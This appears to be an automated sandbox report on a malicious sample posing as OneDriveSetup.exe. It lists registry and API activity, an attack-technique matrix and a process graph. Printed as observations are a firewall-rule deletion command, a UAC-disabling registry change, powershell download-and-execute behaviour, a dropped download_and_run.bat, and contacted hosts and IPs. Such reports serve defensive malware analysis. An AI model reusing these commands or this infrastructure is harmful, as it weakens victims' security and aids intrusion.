                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Users\user\Desktop\OneDriveSetup.exeCode function: 0_2_0000000140017270 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0000000140017270
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0082CFA7 GetTimeZoneInformation,9_2_0082CFA7
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CEF8290 __EH_prolog3_GS,GetCurrentThread,GetCurrentThreadId,GetVersionExW,9_2_6CEF8290
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Changes security center settings (notifications, updates, antivirus, firewall)
                Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                Disables UAC (registry)
                Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                Modifies the windows firewall
                Source: C:\Users\Public\Videos\bin.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
                Uses netsh to modify the Windows network and firewall settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
                Source: svchost.exe, 00000007.00000002.3069218145.000001A2A8902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                Source: svchost.exe, 00000007.00000002.3069218145.000001A2A8902000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: OneDriveSetup.exe, OneDriveSetup.exe, 00000000.00000002.1308507691.000001F7949B0000.00000040.00001000.00020000.00000000.sdmp, OneDriveSetup.exe, 00000000.00000002.1304225882.0000000140000000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360Tray.exe
                Source: OneDriveSetup.exeBinary or memory string: MsMpEng.exe
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
                Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Modifies the DNS server
                Source: C:\Windows\System32\svchost.exeRegistry value created:
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_0066240A glHint,glClearColor,glPixelStorei,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexEnvf,9_2_0066240A
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_00666AC8 glPixelStorei,glHint,glClearColor,glPixelStorei,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexEnvf,glPixelStorei,glEnable,glEnable,glBindTexture,glPixelStorei,glPixelStorei,glPixelStorei,glTexImage2D,glPixelStorei,glPixelStorei,glTexSubImage2D,glPixelStorei,glPixelStorei,glPixelStorei,glTexSubImage2D,glDisable,glDisable,glDisable,9_2_00666AC8

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information11
                Scripting                		Valid Accounts341
                Windows Management Instrumentation                		11
                Scripting                		1
                LSASS Driver                		411
                Disable or Modify Tools                		31
                Input Capture                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		2
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API                		1
                LSASS Driver                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory3
                File and Directory Discovery                		Remote Desktop Protocol31
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts12
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		Security Account Manager167
                System Information Discovery                		SMB/Windows Admin Shares1
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts3
                PowerShell                		3
                Windows Service                		3
                Windows Service                		11
                Software Packing                		NTDS1
                Query Registry                		Distributed Component Object ModelInput Capture3
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchd111
                Registry Run Keys / Startup Folder                		112
                Process Injection                		1
                Timestomp                		LSA Secrets4101
                Security Software Discovery                		SSHKeylogging14
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts111
                Registry Run Keys / Startup Folder                		1
                DLL Side-Loading                		Cached Domain Credentials2
                Process Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                File Deletion                		DCSync281
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job32
                Masquerading                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Modify Registry                		/etc/passwd and /etc/shadow21
                System Network Configuration Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron281
                Virtualization/Sandbox Evasion                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Access Token Manipulation                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task112
                Process Injection                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1664120 Sample: OneDriveSetup.exe Startdate: 13/04/2025 Architecture: WINDOWS Score: 82 136 aa-1348336590.cos.ap-hongkong.myqcloud.com 2->136 138 yandex.com 2->138 140 14 other IPs or domains 2->140 154 Multi AV Scanner detection for submitted file 2->154 156 Yara detected Powershell download and execute 2->156 158 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 2->158 160 8 other signatures 2->160 12 OneDriveSetup.exe 22 2->12         started        17 Agghosts.exe 2->17         started        19 svchost.exe 2->19         started        21 12 other processes 2->21 signatures3 process4 dnsIp5 142 hk.file.myqcloud.com 43.132.105.214, 443, 49714, 49722 LILLY-ASUS Japan 12->142 144 www.wshifen.com 103.235.46.115, 443, 49719, 49741 BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtd Hong Kong 12->144 120 C:\Users\Public\Music\...\Agghosts.exe, PE32 12->120 dropped 122 C:\Users\Public\Videos\download_and_run.bat, ISO-8859 12->122 dropped 124 C:\Users\Public\Music\...\libcef.dll, PE32 12->124 dropped 190 Detected unpacking (creates a PE file in dynamic memory) 12->190 192 Uses cmd line tools excessively to alter registry or file data 12->192 23 cmd.exe 1 12->23         started        26 cmd.exe 1 12->26         started        28 reg.exe 1 1 12->28         started        146 143.92.56.59, 6666, 8888 BCPL-SGBGPNETGlobalASNSG Singapore 17->146 194 Contains functionality to inject code into remote processes 17->194 196 Changes security center settings (notifications, updates, antivirus, firewall) 19->196 30 MpCmdRun.exe 19->30         started        148 127.0.0.1 unknown unknown 21->148 198 Modifies the DNS server 21->198 32 drvinst.exe 21->32         started        35 drvinst.exe 21->35         started        file6 signatures7 process8 file9 174 Suspicious powershell command line found 23->174 176 Uses cmd line tools excessively to alter registry or file data 23->176 178 Tries to download and execute files (via powershell) 23->178 37 bin.exe 10 299 23->37         started        41 powershell.exe 14 16 23->41         started        43 conhost.exe 23->43         started        45 chcp.com 1 23->45         started        47 reg.exe 1 26->47         started        49 conhost.exe 26->49         started        180 Creates multiple autostart registry keys 28->180 51 conhost.exe 1 28->51         started        53 conhost.exe 30->53         started        102 C:\Windows\System32\...\tap0901.sys (copy), PE32+ 32->102 dropped 104 C:\Windows\System32\...\SETEB17.tmp, PE32+ 32->104 dropped 106 C:\Windows\System32\...\tap0901.sys (copy), PE32+ 35->106 dropped 108 C:\Windows\System32\drivers\SETF101.tmp, PE32+ 35->108 dropped signatures10 process11 file12 110 C:\Program Files (x86)\...\tap0901.sys, PE32+ 37->110 dropped 112 C:\Program Files (x86)\...\LetsPRO.exe, PE32 37->112 dropped 114 C:\Program Files (x86)\...\LetsPRO.exe.config, XML 37->114 dropped 118 219 other files (1 malicious) 37->118 dropped 164 Bypasses PowerShell execution policy 37->164 166 Modifies the windows firewall 37->166 168 Sample is not signed and drops a device driver 37->168 55 LetsPRO.exe 37->55         started        57 cmd.exe 37->57         started        60 powershell.exe 37->60         started        62 8 other processes 37->62 116 C:\Users\Public\Videos\bin.exe, PE32 41->116 dropped 170 Powershell drops PE file 41->170 172 Disables UAC (registry) 47->172 signatures13 process14 file15 65 LetsPRO.exe 55->65         started        182 Uses netsh to modify the Windows network and firewall settings 57->182 184 Uses ipconfig to lookup or modify the Windows network settings 57->184 186 Performs a network lookup / discovery via ARP 57->186 69 conhost.exe 57->69         started        71 netsh.exe 57->71         started        188 Loading BitLocker PowerShell Module 60->188 73 conhost.exe 60->73         started        126 C:\Users\user\AppData\...\tap0901.sys (copy), PE32+ 62->126 dropped 128 C:\Users\user\AppData\Local\...\SETE887.tmp, PE32+ 62->128 dropped 75 conhost.exe 62->75         started        77 conhost.exe 62->77         started        79 conhost.exe 62->79         started        81 9 other processes 62->81 signatures16 process17 dnsIp18 130 yandex.com 77.88.44.55, 443, 49742 YANDEXRU Russian Federation 65->130 132 23.98.101.155, 443, 49747, 49755 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 65->132 134 11 other IPs or domains 65->134 150 Creates multiple autostart registry keys 65->150 152 Loading BitLocker PowerShell Module 65->152 83 cmd.exe 65->83         started        86 cmd.exe 65->86         started        88 cmd.exe 65->88         started        signatures19 process20 signatures21 162 Performs a network lookup / discovery via ARP 83->162 90 conhost.exe 83->90         started        92 ARP.EXE 83->92         started        94 conhost.exe 86->94         started        96 ipconfig.exe 86->96         started        98 conhost.exe 88->98         started        100 ROUTE.EXE 88->100         started        process22

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.